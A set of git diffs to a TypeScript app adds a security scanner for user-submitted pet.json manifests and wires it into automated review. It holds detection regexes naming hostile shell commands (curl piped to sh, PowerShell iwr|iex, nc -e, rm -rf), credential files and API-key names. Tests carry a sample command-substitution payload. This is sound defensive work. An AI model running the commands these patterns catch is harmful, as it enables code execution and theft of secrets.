@@ -214,28 +225,22 @@ export function scanPetSecurity(input: ScanInput): PetSecurityScan {
 export function scanPetManifestsSecurity(
   input: ManifestScanInput,
 ): PetSecurityScan {
+  const petJsonScan = scanPetSecurity({ petJson: input.petJson });
+  const submittedScan = scanPetSecurity({
+    petJson: {},
+    displayName: input.displayName,
+    description: input.description,
+  });
+  const decisions = [petJsonScan.decision, submittedScan.decision];
   const findings = [
-    ...prefixFindings(
-      scanPetSecurity({ petJson: input.petJson }).findings,
-      "petJsonUrl",
-    ),
-    ...prefixFindings(
-      scanPetSecurity({
-        petJson: {},
-        displayName: input.displayName,
-        description: input.description,
-      }).findings,
-      "submitted",
-    ),
+    ...prefixFindings(petJsonScan.findings, "petJsonUrl"),
+    ...prefixFindings(submittedScan.findings, "submitted"),
   ];
 
   if (input.zipPetJson !== undefined) {
-    findings.push(
-      ...prefixFindings(
-        scanPetSecurity({ petJson: input.zipPetJson }).findings,
-        "zip.petJson",
-      ),
-    );
+    const zipScan = scanPetSecurity({ petJson: input.zipPetJson });
+    decisions.push(zipScan.decision);
+    findings.push(...prefixFindings(zipScan.findings, "zip.petJson"));
     if (stableJson(input.petJson) !== stableJson(input.zipPetJson)) {
       findings.push({
         code: "pet_json_manifest_mismatch",
@@ -246,12 +251,19 @@ export function scanPetManifestsSecurity(
     }
   }
 
-  return scanFromFindings(findings);
+  return scanFromFindings(findings, decisions);
 }
 
-function scanFromFindings(findings: PetSecurityFinding[]): PetSecurityScan {
-  const hasFail = findings.some((finding) => finding.severity === "fail");
-  const hasHold = findings.some((finding) => finding.severity === "hold");
+function scanFromFindings(
+  findings: PetSecurityFinding[],
+  decisions: ReviewCheckDecision[] = [],
+): PetSecurityScan {
+  const hasFail =
+    decisions.includes("fail") ||
+    findings.some((finding) => finding.severity === "fail");
+  const hasHold =
+    decisions.includes("hold") ||
+    findings.some((finding) => finding.severity === "hold");
   const decision: ReviewCheckDecision = hasFail
     ? "fail"
     : hasHold
@@ -301,8 +313,14 @@ function hasBlockedControlCharacter(value: string): boolean {
   return false;
 }
 
-function redactEvidence(code: string, evidence: string): string {
-  if (code === "credential_exfiltration_reference") {
+function redactEvidence(code: string, evidence: string, key?: string): string {
+  if (key && sensitiveKey.test(key)) {
+    return `${key}: [redacted]`;
+  }
+  if (
+    code === "credential_exfiltration_reference" ||
+    credentialReferenceRe.test(evidence)
+  ) {
     return "[redacted credential reference]";
   }
   if (code === "sensitive_metadata_key") {

--- a/src/lib/pet-security.ts
+++ b/src/lib/pet-security.ts
@@ -1,0 +1,228 @@
+import type { ReviewCheckDecision } from "@/lib/submission-review-types";
+
+export type PetSecurityFinding = {
+  code: string;
+  severity: "fail" | "hold";
+  path: string;
+  evidence: string;
+};
+
+export type PetSecurityScan = {
+  decision: ReviewCheckDecision;
+  reasons: string[];
+  findings: PetSecurityFinding[];
+};
+
+type ScanInput = {
+  petJson: unknown;
+  displayName?: string | null;
+  description?: string | null;
+};
+
+const MAX_FINDINGS = 24;
+const MAX_DEPTH = 12;
+const MAX_NODES = 3000;
+const MAX_ARRAY_ITEMS = 120;
+const MAX_STRING_LENGTH = 4000;
+
+const executableKey =
+  /^(command|cmd|exec|shell|script|scripts|postinstall|preinstall|installcommand|hook|hooks|launchagent|plist)$/i;
+const sensitiveKey =
+  /^(apikey|api_key|authtoken|auth_token|secret|token|env|envfile|env_file)$/i;
+
+const failPatterns: Array<{ code: string; re: RegExp }> = [
+  {
+    code: "shell_command_substitution",
+    re: /\$\([^)\r\n]{1,500}\)|`[^`\r\n]{1,500}`/,
+  },
+  {
+    code: "shell_download_pipe",
+    re: /\b(?:curl|wget)\b[\s\S]{0,240}\|\s*(?:sh|bash|zsh|fish)\b/i,
+  },
+  {
+    code: "powershell_download_execute",
+    re: /\b(?:irm|iwr|invoke-webrequest)\b[\s\S]{0,240}\|\s*(?:iex|invoke-expression)\b/i,
+  },
+  {
+    code: "interpreter_inline_execution",
+    re: /\b(?:sh|bash|zsh|fish|cmd\.exe|powershell|pwsh|osascript|python3?|node|ruby|perl)\s+-(?:c|e|enc|encodedcommand)\b/i,
+  },
+  {
+    code: "destructive_shell_command",
+    re: /\b(?:rm\s+-rf|chmod\s+\+x|chown\s+|launchctl\s+(?:load|bootstrap)|crontab\s+-|nc\s+-e|mkfifo\s+)\b/i,
+  },
+  {
+    code: "credential_exfiltration_reference",
+    re: /(?:~\/\.ssh|\/\.ssh\/|id_rsa|id_ed25519|\.env\b|OPENAI_API_KEY|ANTHROPIC_API_KEY|GITHUB_TOKEN|CLERK_SECRET_KEY|process\.env|document\.cookie|localStorage)/i,
+  },
+  {
+    code: "active_script_url",
+    re: /\b(?:javascript|vbscript|file):/i,
+  },
+  {
+    code: "html_data_url",
+    re: /\bdata\s*:\s*(?:text\/html|application\/javascript|text\/javascript)/i,
+  },
+];
+
+const holdPatterns: Array<{ code: string; re: RegExp }> = [
+  {
+    code: "external_url_in_pet_json",
+    re: /\bhttps?:\/\/[^\s"'<>]+/i,
+  },
+  {
+    code: "encoded_payload_marker",
+    re: /\b(?:base64|fromcharcode|atob|eval|new Function)\b/i,
+  },
+];
+
+export function scanPetSecurity(input: ScanInput): PetSecurityScan {
+  const findings: PetSecurityFinding[] = [];
+  let nodes = 0;
+
+  const add = (
+    severity: PetSecurityFinding["severity"],
+    code: string,
+    path: string,
+    evidence: string,
+  ) => {
+    if (findings.length >= MAX_FINDINGS) return;
+    const clipped = evidence.replace(/\s+/g, " ").trim().slice(0, 220);
+    if (
+      findings.some(
+        (finding) =>
+          finding.code === code &&
+          finding.path === path &&
+          finding.evidence === clipped,
+      )
+    ) {
+      return;
+    }
+    findings.push({ severity, code, path, evidence: clipped });
+  };
+
+  const scanText = (path: string, value: string, key?: string) => {
+    if (value.length > MAX_STRING_LENGTH) {
+      add("hold", "large_string_value", path, `String length ${value.length}`);
+    }
+    if (hasBlockedControlCharacter(value)) {
+      add("fail", "control_character_payload", path, value);
+    }
+
+    for (const pattern of failPatterns) {
+      if (pattern.re.test(value)) add("fail", pattern.code, path, value);
+    }
+    for (const pattern of holdPatterns) {
+      if (pattern.re.test(value)) add("hold", pattern.code, path, value);
+    }
+
+    if (key && executableKey.test(key) && value.trim()) {
+      add("fail", "executable_metadata_key", path, `${key}: ${value}`);
+    }
+    if (key && sensitiveKey.test(key) && value.trim()) {
+      add("hold", "sensitive_metadata_key", path, `${key}: ${value}`);
+    }
+    if (key && /path$/i.test(key)) {
+      if (/^\s*(?:\/|~\/|[a-z]:\\|\\\\|https?:\/\/)/i.test(value)) {
+        add("hold", "absolute_or_remote_path", path, `${key}: ${value}`);
+      }
+      if (/(?:^|[\\/])\.\.(?:[\\/]|$)/.test(value)) {
+        add("fail", "path_traversal", path, `${key}: ${value}`);
+      }
+    }
+  };
+
+  const scan = (value: unknown, path: string, depth: number, key?: string) => {
+    nodes += 1;
+    if (nodes > MAX_NODES) {
+      add("hold", "json_too_large_to_scan", path, `Visited ${nodes} nodes`);
+      return;
+    }
+    if (depth > MAX_DEPTH) {
+      add("hold", "json_too_deep", path, `Depth ${depth}`);
+      return;
+    }
+
+    if (typeof value === "string") {
+      scanText(path, value, key);
+      return;
+    }
+    if (Array.isArray(value)) {
+      if (value.length > MAX_ARRAY_ITEMS) {
+        add("hold", "large_array_value", path, `Array length ${value.length}`);
+      }
+      value.slice(0, MAX_ARRAY_ITEMS).forEach((item, index) => {
+        scan(item, `${path}[${index}]`, depth + 1);
+      });
+      return;
+    }
+    if (value && typeof value === "object") {
+      const record = value as Record<string, unknown>;
+      for (const [childKey, childValue] of Object.entries(record)) {
+        if (executableKey.test(childKey) && typeof childValue !== "string") {
+          add(
+            "hold",
+            "executable_metadata_key",
+            joinPath(path, childKey),
+            childKey,
+          );
+        }
+        if (sensitiveKey.test(childKey) && typeof childValue !== "string") {
+          add(
+            "hold",
+            "sensitive_metadata_key",
+            joinPath(path, childKey),
+            childKey,
+          );
+        }
+        scan(childValue, joinPath(path, childKey), depth + 1, childKey);
+      }
+    }
+  };
+
+  if (!isPlainRecord(input.petJson)) {
+    add("hold", "pet_json_root_not_object", "$", typeof input.petJson);
+  } else {
+    scan(input.petJson, "$", 0);
+  }
+
+  if (input.displayName) scanText("submitted.displayName", input.displayName);
+  if (input.description) scanText("submitted.description", input.description);
+
+  const hasFail = findings.some((finding) => finding.severity === "fail");
+  const hasHold = findings.some((finding) => finding.severity === "hold");
+  const decision: ReviewCheckDecision = hasFail
+    ? "fail"
+    : hasHold
+      ? "hold"
+      : "pass";
+
+  return {
+    decision,
+    reasons: findings.map((finding) => `${finding.code}: ${finding.evidence}`),
+    findings,
+  };
+}
+
+function joinPath(parent: string, key: string): string {
+  return /^[A-Za-z_$][A-Za-z0-9_$]*$/.test(key)
+    ? `${parent}.${key}`
+    : `${parent}[${JSON.stringify(key)}]`;
+}
+
+function isPlainRecord(value: unknown): value is Record<string, unknown> {
+  return (
+    typeof value === "object" &&
+    value !== null &&
+    !Array.isArray(value) &&
+    Object.getPrototypeOf(value) === Object.prototype
+  );
+}
+
+function hasBlockedControlCharacter(value: string): boolean {
+  for (let index = 0; index < value.length; index++) {
+    const code = value.charCodeAt(index);
+    if (code === 0 || code === 27 || code === 127) return true;
+  }
+  return false;
+}

--- a/src/lib/pet-security.ts
+++ b/src/lib/pet-security.ts
@@ -35,6 +35,8 @@ const sensitiveKey =
   /^(apikey|api_key|authtoken|auth_token|secret|token|env|envfile|env_file)$/i;
 const credentialReferenceRe =
   /(?:~\/\.ssh|\/\.ssh\/|id_rsa|id_ed25519|\.env\b|OPENAI_API_KEY|ANTHROPIC_API_KEY|GITHUB_TOKEN|CLERK_SECRET_KEY|process\.env|document\.cookie|localStorage)/i;
+const tokenValueRe =
+  /\b(?:sk-(?:proj|live|test|ant|admin)-[A-Za-z0-9_-]{8,}|gh[pousr]_[A-Za-z0-9_]{16,}|github_pat_[A-Za-z0-9_]{20,}|xox[baprs]-[A-Za-z0-9-]{10,}|(?:pk|sk)_(?:live|test)_[A-Za-z0-9]{8,}|rk_(?:live|test)_[A-Za-z0-9]{8,}|[A-Za-z0-9_-]{20,}\.[A-Za-z0-9_-]{20,}\.[A-Za-z0-9_-]{20,})\b/g;
 
 const failPatterns: Array<{ code: string; re: RegExp }> = [
   {
@@ -63,7 +65,7 @@ const failPatterns: Array<{ code: string; re: RegExp }> = [
   },
   {
     code: "active_script_url",
-    re: /\b(?:javascript|vbscript|file):/i,
+    re: /\b(?:javascript|vbscript):[^\s"'<>]+|\bfile:\/\/[^\s"'<>]+/i,
   },
   {
     code: "html_data_url",
@@ -327,7 +329,7 @@ function redactEvidence(code: string, evidence: string, key?: string): string {
     const key = evidence.split(":")[0]?.trim();
     return key ? `${key}: [redacted]` : "[redacted sensitive value]";
   }
-  return evidence;
+  return evidence.replace(tokenValueRe, "[redacted secret]");
 }
 
 function stableJson(value: unknown): string {

--- a/src/lib/pet-security.ts
+++ b/src/lib/pet-security.ts
@@ -33,8 +33,12 @@ const CAPPED_FAIL_EVIDENCE =
 
 const executableKey =
   /^(command|cmd|exec|shell|script|scripts|postinstall|preinstall|installcommand|hook|hooks|launchagent|plist)$/i;
-const sensitiveKey =
+const exactSensitiveKey =
   /^(apikey|api_key|authtoken|auth_token|secret|token|env|envfile|env_file)$/i;
+const normalizedSensitiveKey =
+  /(?:apikey|authtoken|accesstoken|refreshtoken|secret|token|envfile|privatekey)$/i;
+const providerSecretKey =
+  /^(?:openai|anthropic|github|clerk|vercel|stripe|supabase|neon).*(?:key|token|secret)$/i;
 const freeTextKey =
   /^(displayname|display_name|name|title|description|summary|bio|notes?|author)$/i;
 const credentialReferenceRe =
@@ -156,6 +160,9 @@ export function scanPetSecurity(input: ScanInput): PetSecurityScan {
         key,
       );
     }
+    if (hasTokenValue(value)) {
+      add("hold", "secret_token_value", path, value, key);
+    }
     for (const pattern of holdPatterns) {
       if (pattern.re.test(value)) add("hold", pattern.code, path, value, key);
     }
@@ -163,7 +170,7 @@ export function scanPetSecurity(input: ScanInput): PetSecurityScan {
     if (key && executableKey.test(key) && value.trim()) {
       add("fail", "executable_metadata_key", path, `${key}: ${value}`, key);
     }
-    if (key && sensitiveKey.test(key) && value.trim()) {
+    if (key && isSensitiveKey(key) && value.trim()) {
       add("hold", "sensitive_metadata_key", path, `${key}: ${value}`, key);
     }
     if (key && /path$/i.test(key)) {
@@ -203,6 +210,7 @@ export function scanPetSecurity(input: ScanInput): PetSecurityScan {
     if (value && typeof value === "object") {
       const record = value as Record<string, unknown>;
       for (const [childKey, childValue] of Object.entries(record)) {
+        scanText(joinPath(path, childKey), childKey);
         if (executableKey.test(childKey) && typeof childValue !== "string") {
           add(
             "hold",
@@ -211,7 +219,7 @@ export function scanPetSecurity(input: ScanInput): PetSecurityScan {
             childKey,
           );
         }
-        if (sensitiveKey.test(childKey) && typeof childValue !== "string") {
+        if (isSensitiveKey(childKey) && typeof childValue !== "string") {
           add(
             "hold",
             "sensitive_metadata_key",
@@ -365,8 +373,22 @@ function isFreeTextField(path: string, key?: string): boolean {
   );
 }
 
+function isSensitiveKey(key: string): boolean {
+  const normalized = key.replace(/[^a-z0-9]/gi, "");
+  return (
+    exactSensitiveKey.test(key) ||
+    normalizedSensitiveKey.test(normalized) ||
+    providerSecretKey.test(normalized)
+  );
+}
+
+function hasTokenValue(value: string): boolean {
+  tokenValueRe.lastIndex = 0;
+  return tokenValueRe.test(value);
+}
+
 function redactEvidence(code: string, evidence: string, key?: string): string {
-  if (key && sensitiveKey.test(key)) {
+  if (key && isSensitiveKey(key)) {
     return `${key}: [redacted]`;
   }
   if (
@@ -379,6 +401,7 @@ function redactEvidence(code: string, evidence: string, key?: string): string {
     const key = evidence.split(":")[0]?.trim();
     return key ? `${key}: [redacted]` : "[redacted sensitive value]";
   }
+  tokenValueRe.lastIndex = 0;
   return evidence.replace(tokenValueRe, "[redacted secret]");
 }
 

--- a/src/lib/pet-security.ts
+++ b/src/lib/pet-security.ts
@@ -28,6 +28,8 @@ const MAX_DEPTH = 12;
 const MAX_NODES = 3000;
 const MAX_ARRAY_ITEMS = 120;
 const MAX_STRING_LENGTH = 4000;
+const CAPPED_FAIL_EVIDENCE =
+  "[redacted security finding omitted by evidence cap]";
 
 const executableKey =
   /^(command|cmd|exec|shell|script|scripts|postinstall|preinstall|installcommand|hook|hooks|launchagent|plist)$/i;
@@ -113,7 +115,20 @@ export function scanPetSecurity(input: ScanInput): PetSecurityScan {
     ) {
       return;
     }
-    if (findings.length >= MAX_FINDINGS) return;
+    if (findings.length >= MAX_FINDINGS) {
+      if (
+        severity === "fail" &&
+        !findings.some((finding) => finding.severity === "fail")
+      ) {
+        findings[MAX_FINDINGS - 1] = {
+          severity,
+          code,
+          path,
+          evidence: CAPPED_FAIL_EVIDENCE,
+        };
+      }
+      return;
+    }
     findings.push({ severity, code, path, evidence: clipped });
   };
 
@@ -243,7 +258,16 @@ export function scanPetManifestsSecurity(
     const zipScan = scanPetSecurity({ petJson: input.zipPetJson });
     decisions.push(zipScan.decision);
     findings.push(...prefixFindings(zipScan.findings, "zip.petJson"));
-    if (stableJson(input.petJson) !== stableJson(input.zipPetJson)) {
+    const petJsonStable = stableJson(input.petJson);
+    const zipPetJsonStable = stableJson(input.zipPetJson);
+    if (!petJsonStable || !zipPetJsonStable) {
+      findings.push({
+        code: "pet_json_manifest_comparison_limit",
+        severity: "hold",
+        path: "zip.petJson",
+        evidence: "manifest comparison exceeded safety limits",
+      });
+    } else if (petJsonStable !== zipPetJsonStable) {
       findings.push({
         code: "pet_json_manifest_mismatch",
         severity: "hold",
@@ -332,13 +356,38 @@ function redactEvidence(code: string, evidence: string, key?: string): string {
   return evidence.replace(tokenValueRe, "[redacted secret]");
 }
 
-function stableJson(value: unknown): string {
-  if (Array.isArray(value)) return `[${value.map(stableJson).join(",")}]`;
-  if (isPlainRecord(value)) {
-    return `{${Object.keys(value)
-      .sort()
-      .map((key) => `${JSON.stringify(key)}:${stableJson(value[key])}`)
-      .join(",")}}`;
-  }
-  return JSON.stringify(value);
+function stableJson(value: unknown): string | null {
+  let nodes = 0;
+
+  const visit = (node: unknown, depth: number): string | null => {
+    nodes += 1;
+    if (nodes > MAX_NODES || depth > MAX_DEPTH) return null;
+    if (typeof node === "string" && node.length > MAX_STRING_LENGTH) {
+      return null;
+    }
+    if (Array.isArray(node)) {
+      if (node.length > MAX_ARRAY_ITEMS) return null;
+      const items = [];
+      for (const item of node) {
+        const value = visit(item, depth + 1);
+        if (value === null) return null;
+        items.push(value);
+      }
+      return `[${items.join(",")}]`;
+    }
+    if (isPlainRecord(node)) {
+      const keys = Object.keys(node).sort();
+      if (keys.length > MAX_ARRAY_ITEMS) return null;
+      const entries = [];
+      for (const key of keys) {
+        const value = visit(node[key], depth + 1);
+        if (value === null) return null;
+        entries.push(`${JSON.stringify(key)}:${value}`);
+      }
+      return `{${entries.join(",")}}`;
+    }
+    return JSON.stringify(node);
+  };
+
+  return visit(value, 0);
 }

--- a/src/lib/pet-security.ts
+++ b/src/lib/pet-security.ts
@@ -87,7 +87,10 @@ export function scanPetSecurity(input: ScanInput): PetSecurityScan {
     evidence: string,
   ) => {
     if (findings.length >= MAX_FINDINGS) return;
-    const clipped = evidence.replace(/\s+/g, " ").trim().slice(0, 220);
+    const clipped = redactEvidence(code, evidence)
+      .replace(/\s+/g, " ")
+      .trim()
+      .slice(0, 220);
     if (
       findings.some(
         (finding) =>
@@ -225,4 +228,15 @@ function hasBlockedControlCharacter(value: string): boolean {
     if (code === 0 || code === 27 || code === 127) return true;
   }
   return false;
+}
+
+function redactEvidence(code: string, evidence: string): string {
+  if (code === "credential_exfiltration_reference") {
+    return "[redacted credential reference]";
+  }
+  if (code === "sensitive_metadata_key") {
+    const key = evidence.split(":")[0]?.trim();
+    return key ? `${key}: [redacted]` : "[redacted sensitive value]";
+  }
+  return evidence;
 }

--- a/src/lib/pet-security.ts
+++ b/src/lib/pet-security.ts
@@ -45,7 +45,7 @@ const tokenValueRe =
 const failPatterns: Array<{ code: string; re: RegExp }> = [
   {
     code: "shell_command_substitution",
-    re: /\$\([^)\r\n]{1,500}\)|`[^`\r\n]{1,500}`/,
+    re: /\$\([^)\r\n]{1,500}\)|`(?=[^`\r\n]{0,500}\b(?:curl|wget|rm|chmod|chown|bash|sh|zsh|fish|cmd\.exe|powershell|pwsh|osascript|python3?|node|ruby|perl|touch|nc|mkfifo|launchctl|crontab)\b)[^`\r\n]{1,500}`/i,
   },
   {
     code: "shell_download_pipe",

--- a/src/lib/submission-decisions.ts
+++ b/src/lib/submission-decisions.ts
@@ -129,8 +129,10 @@ export async function applySubmissionAction(
     row = await runPostApprovalEffects(row, actor, db);
   }
 
+  const skipNotifications =
+    options.skipNotifications ?? options.skipSideEffects ?? false;
   if (
-    !options.skipNotifications &&
+    !skipNotifications &&
     (body.action === "approve" || body.action === "reject")
   ) {
     await notifySubmissionOwner(row);

--- a/src/lib/submission-decisions.ts
+++ b/src/lib/submission-decisions.ts
@@ -40,6 +40,7 @@ export async function applySubmissionAction(
     actor?: SubmissionActionActor;
     db?: SubmissionActionDb;
     skipSideEffects?: boolean;
+    skipNotifications?: boolean;
   } = {},
 ): Promise<SubmissionActionResult> {
   const actor = options.actor ?? "admin";
@@ -129,7 +130,7 @@ export async function applySubmissionAction(
   }
 
   if (
-    !options.skipSideEffects &&
+    !options.skipNotifications &&
     (body.action === "approve" || body.action === "reject")
   ) {
     await notifySubmissionOwner(row);

--- a/src/lib/submission-review-decision.ts
+++ b/src/lib/submission-review-decision.ts
@@ -1,3 +1,4 @@
+import { petSecurityReason } from "@/lib/pet-security";
 import type {
   ReviewChecks,
   ReviewEvidenceMatch,
@@ -31,7 +32,7 @@ export function decideAutomatedReview(
       decision: "auto_reject",
       reasonCode: "security_malicious_pet_json",
       summary:
-        security.reasons[0] ??
+        petSecurityReason(security, "fail") ??
         "Pet metadata contains a high-confidence executable payload.",
       confidence: 1,
     });

--- a/src/lib/submission-review-decision.ts
+++ b/src/lib/submission-review-decision.ts
@@ -25,6 +25,18 @@ const AUTO_APPROVE_CONFIDENCE = 0.9;
 export function decideAutomatedReview(
   checks: ReviewChecks,
 ): ReviewDecisionResult {
+  const security = checks.security;
+  if (security?.decision === "fail") {
+    return applyDecision({
+      decision: "auto_reject",
+      reasonCode: "security_malicious_pet_json",
+      summary:
+        security.reasons[0] ??
+        "Pet metadata contains a high-confidence executable payload.",
+      confidence: 1,
+    });
+  }
+
   const exactMatch = checks.duplicates.exactMatches[0];
   if (exactMatch) {
     return applyDecision({
@@ -117,6 +129,15 @@ function firstHoldReason(
       summary:
         checks.assets.reasons[0] ?? "Asset checks require manual review.",
       confidence: 0.8,
+    };
+  }
+
+  if (checks.security?.decision === "hold") {
+    return {
+      code: "security_review_hold",
+      summary:
+        checks.security.reasons[0] ?? "Security checks require manual review.",
+      confidence: 0.9,
     };
   }
 

--- a/src/lib/submission-review-types.ts
+++ b/src/lib/submission-review-types.ts
@@ -28,7 +28,19 @@ export type PolicyFlag = {
   evidence: string;
 };
 
+export type SecurityFinding = {
+  code: string;
+  severity: "fail" | "hold";
+  path: string;
+  evidence: string;
+};
+
 export type ReviewChecks = {
+  security?: {
+    decision: ReviewCheckDecision;
+    reasons: string[];
+    findings: SecurityFinding[];
+  };
   assets: {
     decision: ReviewCheckDecision;
     reasons: string[];

--- a/src/lib/submission-review.test.ts
+++ b/src/lib/submission-review.test.ts
@@ -21,6 +21,7 @@ import type { ReviewChecks } from "@/lib/submission-review-types";
 function cleanChecks(): ReviewChecks {
   return {
     assets: { decision: "pass", reasons: [] },
+    security: { decision: "pass", reasons: [], findings: [] },
     policy: { decision: "pass", confidence: 0.96, reasons: [], flags: [] },
     duplicates: {
       decision: "pass",
@@ -62,6 +63,48 @@ describe("decideAutomatedReview", () => {
     const result = decideAutomatedReview(checks);
     expect(result.decision).toBe("auto_reject");
     expect(result.reasonCode).toBe("duplicate_exact_asset");
+  });
+
+  it("auto-rejects high-confidence pet.json security payloads", () => {
+    const checks = cleanChecks();
+    checks.security = {
+      decision: "fail",
+      reasons: ["shell_command_substitution: $(touch /tmp/pwned)"],
+      findings: [
+        {
+          code: "shell_command_substitution",
+          severity: "fail",
+          path: "$.displayName",
+          evidence: "$(touch /tmp/pwned)",
+        },
+      ],
+    };
+
+    const result = decideAutomatedReview(checks);
+    expect(result.decision).toBe("auto_reject");
+    expect(result.reasonCode).toBe("security_malicious_pet_json");
+    expect(result.canApply).toBe(true);
+  });
+
+  it("holds suspicious pet.json security findings", () => {
+    const checks = cleanChecks();
+    checks.security = {
+      decision: "hold",
+      reasons: ["external_url_in_pet_json: https://example.com"],
+      findings: [
+        {
+          code: "external_url_in_pet_json",
+          severity: "hold",
+          path: "$.homepage",
+          evidence: "https://example.com",
+        },
+      ],
+    };
+
+    const result = decideAutomatedReview(checks);
+    expect(result.decision).toBe("hold");
+    expect(result.reasonCode).toBe("security_review_hold");
+    expect(result.canApply).toBe(false);
   });
 
   it("auto-approves metadata-only overlaps", () => {

--- a/src/lib/submission-review.test.ts
+++ b/src/lib/submission-review.test.ts
@@ -86,6 +86,38 @@ describe("decideAutomatedReview", () => {
     expect(result.canApply).toBe(true);
   });
 
+  it("uses fail-severity security findings for auto-reject summaries", () => {
+    const checks = cleanChecks();
+    checks.security = {
+      decision: "fail",
+      reasons: [
+        "external_url_in_pet_json: https://example.com",
+        "shell_command_substitution: $(touch /tmp/pwned)",
+      ],
+      findings: [
+        {
+          code: "external_url_in_pet_json",
+          severity: "hold",
+          path: "$.homepage",
+          evidence: "https://example.com",
+        },
+        {
+          code: "shell_command_substitution",
+          severity: "fail",
+          path: "$.displayName",
+          evidence: "$(touch /tmp/pwned)",
+        },
+      ],
+    };
+
+    const result = decideAutomatedReview(checks);
+
+    expect(result.decision).toBe("auto_reject");
+    expect(result.summary).toBe(
+      "shell_command_substitution: $(touch /tmp/pwned)",
+    );
+  });
+
   it("holds suspicious pet.json security findings", () => {
     const checks = cleanChecks();
     checks.security = {

--- a/src/lib/submission-review.ts
+++ b/src/lib/submission-review.ts
@@ -12,7 +12,7 @@ import {
   embedTextValue,
   PETDEX_EMBEDDING_MODEL,
 } from "@/lib/embeddings";
-import { scanPetSecurity } from "@/lib/pet-security";
+import { scanPetManifestsSecurity } from "@/lib/pet-security";
 import { decideAutomatedReview } from "@/lib/submission-review-decision";
 import { preparePolicyReviewImage } from "@/lib/submission-review-image";
 import {
@@ -347,6 +347,8 @@ async function analyzeAssets(row: SubmittedPet): Promise<AssetAnalysis> {
     }
   }
 
+  let zipPetJson: unknown;
+  let hasZipPetJson = false;
   if (zip.ok) {
     try {
       const archive = await JSZip.loadAsync(zip.buffer);
@@ -357,10 +359,25 @@ async function analyzeAssets(row: SubmittedPet): Promise<AssetAnalysis> {
       if (names.some(hasUnsafeZipPath)) {
         reasons.push("zip contains unsafe paths.");
       }
-      const basenames = new Set(names.map((name) => name.split("/").pop()));
-      if (!basenames.has("pet.json")) {
+      const petJsonNames = names.filter((name) => {
+        const file = archive.files[name];
+        return !file?.dir && name.split("/").pop() === "pet.json";
+      });
+      if (petJsonNames.length === 0) {
         reasons.push("zip does not contain pet.json.");
+      } else {
+        if (petJsonNames.length > 1) {
+          reasons.push("zip contains multiple pet.json files.");
+        }
+        try {
+          const raw = await archive.files[petJsonNames[0]].async("string");
+          zipPetJson = JSON.parse(raw);
+          hasZipPetJson = true;
+        } catch {
+          reasons.push("zip pet.json could not be parsed as JSON.");
+        }
       }
+      const basenames = new Set(names.map((name) => name.split("/").pop()));
       if (
         !basenames.has("spritesheet.webp") &&
         !basenames.has("spritesheet.png")
@@ -399,8 +416,9 @@ async function analyzeAssets(row: SubmittedPet): Promise<AssetAnalysis> {
     petJsonSha256: petJson.ok ? sha256(petJson.buffer) : null,
     zipSha256: zip.ok ? sha256(zip.buffer) : null,
   };
-  const security = scanPetSecurity({
+  const security = scanPetManifestsSecurity({
     petJson: parsedJson,
+    zipPetJson: hasZipPetJson ? zipPetJson : undefined,
     displayName: row.displayName,
     description: row.description,
   });

--- a/src/lib/submission-review.ts
+++ b/src/lib/submission-review.ts
@@ -12,6 +12,7 @@ import {
   embedTextValue,
   PETDEX_EMBEDDING_MODEL,
 } from "@/lib/embeddings";
+import { scanPetSecurity } from "@/lib/pet-security";
 import { decideAutomatedReview } from "@/lib/submission-review-decision";
 import { preparePolicyReviewImage } from "@/lib/submission-review-image";
 import {
@@ -63,6 +64,7 @@ export type ReviewSubmissionResult = {
 
 type AssetAnalysis = {
   check: ReviewChecks["assets"];
+  security: NonNullable<ReviewChecks["security"]>;
   spriteBuffer: Buffer | null;
   petJson: unknown;
   dhash: string | null;
@@ -152,6 +154,7 @@ export async function reviewSubmission(
     ]);
 
     checks = {
+      security: assets.security,
       assets: assets.check,
       policy,
       duplicates,
@@ -389,6 +392,11 @@ async function analyzeAssets(row: SubmittedPet): Promise<AssetAnalysis> {
     petJsonSha256: petJson.ok ? sha256(petJson.buffer) : null,
     zipSha256: zip.ok ? sha256(zip.buffer) : null,
   };
+  const security = scanPetSecurity({
+    petJson: parsedJson,
+    displayName: row.displayName,
+    description: row.description,
+  });
 
   return {
     check: {
@@ -396,6 +404,7 @@ async function analyzeAssets(row: SubmittedPet): Promise<AssetAnalysis> {
       reasons,
       hashes,
     },
+    security,
     spriteBuffer: sprite.ok ? sprite.buffer : null,
     petJson: parsedJson,
     dhash,
@@ -1119,6 +1128,11 @@ function buildPolicyUserPrompt(row: SubmittedPet, petJson: unknown): string {
 
 function emptyChecks(dryRun: boolean): ReviewChecks {
   return {
+    security: {
+      decision: "hold",
+      reasons: ["Security review has not run yet."],
+      findings: [],
+    },
     assets: { decision: "hold", reasons: ["Review has not run yet."] },
     policy: { decision: "hold", confidence: 0, reasons: [], flags: [] },
     duplicates: {

--- a/src/lib/submission-review.ts
+++ b/src/lib/submission-review.ts
@@ -38,6 +38,8 @@ import { isAllowedAssetUrl } from "@/lib/url-allowlist";
 
 const MAX_ASSET_BYTES = 8 * 1024 * 1024;
 const MAX_ZIP_ENTRIES = 80;
+const MAX_ZIP_PET_JSON_SCAN_ENTRIES = 16;
+const MAX_ZIP_PET_JSON_TOTAL_BYTES = MAX_ASSET_BYTES;
 const MIN_SPRITE_DIM = 256;
 const FRAME_W = 192;
 const FRAME_H = 208;
@@ -390,13 +392,25 @@ async function analyzeAssets(row: SubmittedPet): Promise<AssetAnalysis> {
         if (petJsonNames.length > 1) {
           reasons.push("zip contains multiple pet.json files.");
         }
+        let zipPetJsonTotalBytes = 0;
         for (const name of petJsonNames) {
-          const zipped = await readZipPetJson(
-            archive.files[name],
-            MAX_ASSET_BYTES,
-          );
+          if (zipPetJsons.length >= MAX_ZIP_PET_JSON_SCAN_ENTRIES) {
+            reasons.push("zip pet.json scan entry limit reached.");
+            break;
+          }
+          const entry = archive.files[name];
+          const size = zipEntryUncompressedSize(entry);
+          if (
+            size !== null &&
+            zipPetJsonTotalBytes + size > MAX_ZIP_PET_JSON_TOTAL_BYTES
+          ) {
+            reasons.push("zip pet.json total size exceeds the scan limit.");
+            break;
+          }
+          const zipped = await readZipPetJson(entry, MAX_ASSET_BYTES);
           if (zipped.ok) {
             zipPetJsons.push({ name, petJson: zipped.petJson });
+            zipPetJsonTotalBytes += size ?? 0;
           } else {
             reasons.push(`zip ${name}: ${zipped.reason}`);
           }

--- a/src/lib/submission-review.ts
+++ b/src/lib/submission-review.ts
@@ -369,12 +369,15 @@ async function analyzeAssets(row: SubmittedPet): Promise<AssetAnalysis> {
         if (petJsonNames.length > 1) {
           reasons.push("zip contains multiple pet.json files.");
         }
-        try {
-          const raw = await archive.files[petJsonNames[0]].async("string");
